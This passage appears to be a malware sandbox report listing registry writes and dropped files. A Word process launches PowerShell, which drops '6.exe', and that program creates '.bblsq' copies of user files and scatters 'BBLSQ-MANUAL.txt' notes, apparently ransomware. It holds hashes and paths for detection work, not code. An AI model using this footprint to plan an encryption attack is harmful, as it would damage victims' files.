Vijaya
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Viner Hand ITC
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vivaldi
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vladimir Script
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vrinda
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Webdings
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wide Latin
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wingdings
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wingdings 2
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wingdings 3
0
3284
powershell.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\5F\52C64B7E
LanguageList
en-US
3284
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
0
3284
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
0
3284
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
4294901760
3284
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
4294901760
3284
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
1048576
3284
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
%windir%\tracing
3284
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
0
3284
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
0
3284
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
4294901760
3284
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
4294901760
3284
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
1048576
3284
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
%windir%\tracing
3284
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
3284
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1
2456
6.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
2456
6.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1

Files activity

Executable files
1
Suspicious files
419
Text files
320
Unknown types
25

Dropped files

PID
Process
Filename
Type
3284
powershell.exe
C:\windows\temp\6.exe
executable
MD5: 25dc3086de8bdd780b89b0a7cd9d51bb
SHA256: c50167d9a899572e7dba0da1d80e3b9a94b2d3803a8f125119097ed5f92add6d
3496
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\CVRDE0D.tmp.cvr
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\Public\Videos\Sample Videos\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\Public\Recorded TV\Sample Media\win7_scenic-demoshort_raw.wtv
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\Public\Recorded TV\Sample Media\win7_scenic-demoshort_raw.wtv.bblsq
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\Public\Pictures\Sample Pictures\Tulips.jpg.bblsq
binary
MD5: f5beb4feed5a4824e9f57b37e2976f6b
SHA256: 1fa74ad6146f7e313510dd6992c7531878e99facb328e18de5144e3c47006e17
2456
6.exe
C:\Users\Public\Recorded TV\Sample Media\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\Public\Recorded TV\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\Public\Pictures\Sample Pictures\Tulips.jpg
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\Public\Pictures\Sample Pictures\Penguins.jpg.bblsq
binary
MD5: ae0714e58bbb1727695afbc9f6752382
SHA256: 9b0520f612b0e61ea40f70d2e0c6eaf7ba90f7d1846b1fb4ce1db1fe9ce94c48
2456
6.exe
C:\Users\Public\Pictures\Sample Pictures\Penguins.jpg
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\Public\Pictures\Sample Pictures\Lighthouse.jpg.bblsq
binary
MD5: d64452e72ba10cde226d93e50df8ab95
SHA256: beeab7e7eb9f003a7a9c1c9f4b5769812eaebfc40196feb4ce232e5a77e5efc2
2456
6.exe
C:\Users\Public\Pictures\Sample Pictures\Lighthouse.jpg
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\Public\Pictures\Sample Pictures\Koala.jpg.bblsq
binary
MD5: 05a3bc41c25a4466ea49799f7b2435c3
SHA256: f6f76d9c0939334fff3affbe2a245adb097a359edc50221901f9ed04fb3719d2
2456
6.exe
C:\Users\Public\Pictures\Sample Pictures\Koala.jpg
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\Public\Pictures\Sample Pictures\Jellyfish.jpg.bblsq
binary
MD5: 300c9479d912b6e9070503e647e3dae5
SHA256: 90096c68b8f95ba53ed72f119c363169d8db18b8d19893140ea7b81f15c1cbd5
2456
6.exe
C:\Users\Public\Pictures\Sample Pictures\Jellyfish.jpg
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\Public\Pictures\Sample Pictures\Hydrangeas.jpg.bblsq
binary
MD5: 4ea9a2625bf2303084018541f17d60f0
SHA256: 1b35abb3bf50942ff91f2ccee15b8ba29196bc004ebe02bee03d4385ab57ee64
2456
6.exe
C:\Users\Public\Pictures\Sample Pictures\Hydrangeas.jpg
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\Public\Pictures\Sample Pictures\Desert.jpg.bblsq
binary
MD5: 5b2203643434ec5ac8dc1953a9916f18
SHA256: a96a86d90c162de80c4fc92451127e516941e698070fcc62b5c1fdee4efc1ca7
2456
6.exe
C:\Users\Public\Pictures\Sample Pictures\Desert.jpg
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\Public\Pictures\Sample Pictures\Chrysanthemum.jpg.bblsq
binary
MD5: 72544fc7ab8c683fb204fa3a6dffafb6
SHA256: 1e27ea972d9f1f7ae58b01364f9443f4ffe92a40fbc530152550f85691b7413c
2456
6.exe
C:\Users\Public\Pictures\Sample Pictures\Chrysanthemum.jpg
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\Public\Pictures\Sample Pictures\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\Public\Music\Sample Music\Sleep Away.mp3.bblsq
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\Public\Music\Sample Music\Sleep Away.mp3
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\Public\Music\Sample Music\Maid with the Flaxen Hair.mp3.bblsq
binary
MD5: 80c7fcf27a1295660e7699e8e1515e06
SHA256: b87261896095995717d5e966deed060c5541dfedede2acd12b77471b8abb2522
2456
6.exe
C:\Users\Public\Music\Sample Music\Maid with the Flaxen Hair.mp3
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\Public\Music\Sample Music\Kalimba.mp3
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\Public\Music\Sample Music\Kalimba.mp3.bblsq
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\Public\Music\Sample Music\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\Public\Libraries\RecordedTV.library-ms.bblsq
binary
MD5: 7cb5b6cb675efcb7c2be7d6162957e8d
SHA256: af165c6f551bab27dc81da729a2a629e4e665f3b4bf23d4356a019d5f284746b
2456
6.exe
C:\Users\Public\Libraries\RecordedTV.library-ms
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\Public\Favorites\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\Public\Libraries\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\Public\Videos\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\Public\Downloads\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\Public\Desktop\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\Public\Music\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\Public\Pictures\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\Public\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\Public\Documents\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\Default\AppData\Roaming\Microsoft\Windows\Templates\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\Default\Saved Games\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\Default\NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000002.regtrans-ms.bblsq
binary
MD5: 4a639be7bae55d6fb13ffbd25b487b4a
SHA256: 260424b7e513f3837aca046a93a1ee3d8824636d53bf679dc1f82c77ee7cab05
2456
6.exe
C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\Default\NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000002.regtrans-ms
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\Default\NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000001.regtrans-ms.bblsq
binary
MD5: 464ad3ebe2057785d408d68095e30ecc
SHA256: 16bc62daeeddf61fccab04e3ce730abfd2b1d0a7e9a6f4803c49b4c120645e82
2456
6.exe
C:\Users\Default\NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000001.regtrans-ms
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\Default\NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TM.blf.bblsq
binary
MD5: f1335a47ca71bb7921b19bf43e1457f3
SHA256: 3900b80294ba4926340c723ea69758628f1ed0e97d98e155d3d14891b195408c
2456
6.exe
C:\Users\Default\NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TM.blf
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\Default\NTUSER.DAT.LOG1.bblsq
binary
MD5: a41106a75d84d7535a5e4a729544b44c
SHA256: 7b75d0e32b7f79aeeb97cd709c9a918d255d3fad844e58afcd0c9651b790fac1
2456
6.exe
C:\Users\Default\NTUSER.DAT.LOG1
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\Default\AppData\Roaming\Microsoft\Windows\Cookies\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\Default\Pictures\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\Default\Documents\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\Default\Links\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\Default\Videos\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\Default\Favorites\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\Default\Desktop\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\Default\Music\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\Default\Downloads\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\Default\AppData\Local\Microsoft\Windows\Temporary Internet Files\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\Default\AppData\Roaming\Microsoft\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\Default\AppData\Roaming\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\Default\AppData\Local\Temp\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\Default\AppData\Roaming\Media Center Programs\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\Default\AppData\Local\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Templates\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\SendTo\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\Default\AppData\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\Default\AppData\Local\Microsoft\Windows\History\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\Default\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\Default\AppData\Local\Microsoft\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\Administrator\Saved Games\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\Administrator\ntuser.ini.bblsq
binary
MD5: 4412cf0c4209ce5c9442f4a369e6bf17
SHA256: b5efd408f571589fbec5b72c43c9fbe6d037790a910113d6fa829322a56fe492
2456
6.exe
C:\Users\Administrator\Searches\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\Administrator\ntuser.ini
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\Administrator\NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000002.regtrans-ms.bblsq
binary
MD5: 3af412f248fa2453dc50accc77b446d8
SHA256: 568392c771aab5c1157987132c75cf7bb03cd26fe7681bdad6aa0b61f38dbcbf
2456
6.exe
C:\Users\Administrator\NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000002.regtrans-ms
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\Administrator\NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000001.regtrans-ms.bblsq
pgc
MD5: 9ca4cb525be41076ddf1ebe3c19b7e54
SHA256: e2ee35aff93c39f821ca4d41e1ff169044e0a6692e91be065892205415469f3c
2456
6.exe
C:\Users\Administrator\NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000001.regtrans-ms
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\Administrator\NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TM.blf.bblsq
binary
MD5: 24d3aea329a5dbf9ac866cd595e31937
SHA256: 4624c67aa75f51ce6ca6eb4881d70cc1a0dc7b0324e06e7dc3cf4590a303f7e6
2456
6.exe
C:\Users\Administrator\NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TM.blf
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\Administrator\ntuser.dat.LOG1.bblsq
binary
MD5: 77ff2f167a1ad0a510459b726099895f
SHA256: 7a2399b552ea66210a188186892ed6aa9924c6b92100728b54447c8d5ca9f3cb
2456
6.exe
C:\Users\Administrator\ntuser.dat.LOG1
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Network Shortcuts\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\Administrator\Links\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\Administrator\Favorites\Windows Live\Windows Live Spaces.url.bblsq
binary
MD5: 880b3f0fea8ac3908797bb0c9acedabd
SHA256: 8b00ee2dfe6fa6ad5a5210715d3682b501356ce990e54659685dbb3bf94f01df
2456
6.exe
C:\Users\Administrator\Favorites\Windows Live\Windows Live Spaces.url
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\Administrator\Favorites\Windows Live\Windows Live Mail.url.bblsq
binary
MD5: 0bb72d9d4b91611462004e89b551ab5a
SHA256: 88df09cc51daff57580a02def150afcf1c45e36fa96bc6cdb1b626fbcdcdff5a
2456
6.exe
C:\Users\Administrator\Favorites\Windows Live\Windows Live Mail.url
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\Administrator\Favorites\Windows Live\Windows Live Gallery.url.bblsq
binary
MD5: 6c1d908574f8cc208182621a396497e0
SHA256: 8fa923a2fb66271d091b402bb157d3d091100c980d41873b1ebc96c4db0c1d78
2456
6.exe
C:\Users\Administrator\Favorites\Windows Live\Windows Live Gallery.url
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\Administrator\Favorites\Windows Live\Get Windows Live.url.bblsq
gpg
MD5: 4f3f6e798f1a84df535b56a785bfeb04
SHA256: 71dbd07e2ab1f21d83085e73a03e4d24d5bab1ef081f3e4b4d1488fa638b46a7
2456
6.exe
C:\Users\Administrator\Favorites\Windows Live\Get Windows Live.url
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\Administrator\Favorites\Windows Live\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\Administrator\Favorites\MSN Websites\MSNBC News.url.bblsq
binary
MD5: 25d483c16972bfc3257d9d0059729f37
SHA256: 17dcb107df7d7bc8eb2918bfdccd1db776fe4e632d16aab7a8a61f0ef4a2ec3c
2456
6.exe
C:\Users\Administrator\Favorites\MSN Websites\MSNBC News.url
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\Administrator\Favorites\MSN Websites\MSN.url.bblsq
binary
MD5: e1efa03f58cb2795a20e8d6cf4c40f28
SHA256: 677d859a41aa711adef2dbf6287a3c524169cfd88e2849a720aee0aa77fd7f73
2456
6.exe
C:\Users\Administrator\Favorites\MSN Websites\MSN.url
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\Administrator\Favorites\MSN Websites\MSN Sports.url.bblsq
binary
MD5: 4de7cae8ac62224a65099890093c9651
SHA256: d7feed9a85da5edb002ca3f7ff7154b5aaadcefde9a6dacc588bb06613261e38
2456
6.exe
C:\Users\Administrator\Favorites\MSN Websites\MSN Sports.url
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\Administrator\Favorites\MSN Websites\MSN Money.url.bblsq
binary
MD5: fb5e6172e9f7a3517633147ee50fcedb
SHA256: 55ed4bb959bca7cf040d0111eab3598e9619c08e08378868b1159eb72c648fcc
2456
6.exe
C:\Users\Administrator\Favorites\MSN Websites\MSN Money.url
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\Administrator\Favorites\MSN Websites\MSN Entertainment.url.bblsq
binary
MD5: 381a3c74a151009362950643b3f72590
SHA256: 31041c5d6daabcc223d58e71f86fb48d07ccebc20bbc267409509ef51bda08ad
2456
6.exe
C:\Users\Administrator\Favorites\MSN Websites\MSN Entertainment.url
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\Administrator\Favorites\MSN Websites\MSN Autos.url.bblsq
binary
MD5: dd00eae7419c0bcfc83a88dcc88cc0aa
SHA256: 2f654c6a9bb7637c934fbde75048bf6d8324545dbe1dee2e9d22fe3445d58ca6
2456
6.exe
C:\Users\Administrator\Favorites\MSN Websites\MSN Autos.url
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\Administrator\Favorites\Microsoft Websites\Microsoft Store.url.bblsq
binary
MD5: 00d21bea5b97809760da12ba1dba9f7e
SHA256: 2e3656d7d88eb84128d57ca478d2def8ea8a2bd1dfabea42a8446a049b55a7fa
2456
6.exe
